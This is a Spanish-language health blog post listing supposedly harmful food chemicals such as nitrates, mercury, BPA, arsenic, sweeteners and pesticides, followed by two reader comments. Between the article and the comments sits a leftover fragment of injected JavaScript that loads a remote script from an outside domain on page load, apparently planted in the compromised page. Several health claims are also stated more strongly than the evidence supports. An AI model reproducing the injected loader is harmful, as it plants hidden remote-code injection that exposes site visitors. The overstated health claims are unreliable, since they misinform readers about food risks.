Salud y belleza » Productos peligrosos, Salud, alimentos

Descubre cuáles son los peores químicos presentes en los alimentos

2 Comentarios

La industria está provocando que consumamos muchos alimentos que son poco aconsejables a nivel nutricional o que contienen aditivos químicos que pueden dañar tu salud. Por eso queremos mostrarte cuáles son algunos de esos químicos presentes en los alimentos que pueden dañar tu salud:

- Nitratos: este aditivo químico se utiliza para preservar el sabor y el sabor de carnes y pescados curados, como salchichas o jamón, pero aumentan el riesgo de padecer enfermedades cardíacas y diabetes del tipo 2.

alimentos-nitratos

- Mercurio: el pescado es muy saludable pero hay algunas especies que pueden contener mucho mercurio y que no es recomendable que consuman mujeres embarazadas o amamantando ni tampoco niños, sobre todo la caballa, el pez espada, el blanquillo y la caballa rey.

alimentos-mercurio

- BPA: se trata del bisfenol A que se encuentra en alimentos enlatados o que están en recipientes de plástico, pero también en el agua y en el aire. Esta sustancia se libera cuando se calienta un recipiente de estas características y puede provocar cáncer de mama o de próstata además de aumentar el riesgo de padecer enfermedades como diabetes o problemas en el sistema inmune.

alimentos-bpa

- Arsénico: es un aditivo químico que se encuentra en aguas subterráneas y que podemos ingerir a través del agua o de algunos alimentos como el arroz. Aumenta los riesgos cardiovasculares, diabetes, lesiones en la piel y cáncer.

alimentos-arsenico

- Endulzantes artificiales: como el aspartamo, sucralosa o sacarina pueden tener efectos secundarios como aumento del apetito, antojos, diabetes… en realidad, aunque muchas personas lo usen para adelgazar puede provocar el efecto contrario.

endulzantes-artificiales

- Organofosforados: se trata de pesticidas muy habituales que se usan en la agricultura y que pueden ser peligrosos para los niños y causarles problemas como déficit de atención. Se encuentra habitualmente en frutas y verduras, por eso cada vez más personas optan por consumir alimentos orgánicos.

alimentos-organofosforados

¿Sabías que los alimentos tenían estos aditivos químicos?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : , ,

2 Comments »

  • lola said:

    nos tienen alimentados con químicos solo para beneficiarse los más grandes… comíamos mejor en otra época cuando había incluso menos comida.

  • uli said:

    yo por lo menos intento comprar la fruta y verdura orgánicas, pero no siempre es fácil encontrarlo.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.